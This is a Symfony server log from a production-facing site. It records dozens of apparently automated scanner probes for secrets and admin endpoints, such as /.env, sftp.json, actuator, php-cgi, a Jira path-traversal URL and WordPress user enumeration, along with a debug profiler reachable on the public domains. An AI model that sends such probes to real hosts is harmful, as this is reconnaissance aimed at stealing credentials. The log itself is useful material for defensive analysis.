[2025-12-18 09:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:13:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:14:13] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-18 09:14:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 09:14:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 09:14:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 09:14:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 09:14:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 09:14:13] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 09:29:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 09:39:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0b323","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0b323?panel=twig","method":"GET"} []
[2025-12-18 09:39:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 09:41:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=form","method":"GET"} []
[2025-12-18 09:41:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 09:47:40] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"42d0c1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/42d0c1/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-18 09:47:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-18 09:50:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 09:50:59] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-18 09:50:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-18 09:52:44] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-18 09:53:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c5960","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c5960?panel=time","method":"GET"} []
[2025-12-18 09:53:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 10:02:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=109.199.118.129&limit=10","method":"GET"} []
[2025-12-18 10:02:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=109.199.118.129&limit=10","method":"GET"} []
[2025-12-18 10:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d01650","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d01650?panel=logger","method":"GET"} []
[2025-12-18 10:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 10:12:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 10:29:11] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FExpressionVoter.php&line=27","method":"GET"} []
[2025-12-18 10:31:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 10:37:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=exception","method":"GET"} []
[2025-12-18 10:37:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 10:50:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"711f96","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/711f96?panel=form","method":"GET"} []
[2025-12-18 10:50:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 11:05:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"51ec68","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/51ec68?panel=config","method":"GET"} []
[2025-12-18 11:05:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 11:06:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"17d1fc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/17d1fc","method":"GET"} []
[2025-12-18 11:06:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 11:08:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"39ad3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/39ad3a","method":"GET"} []
[2025-12-18 11:08:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
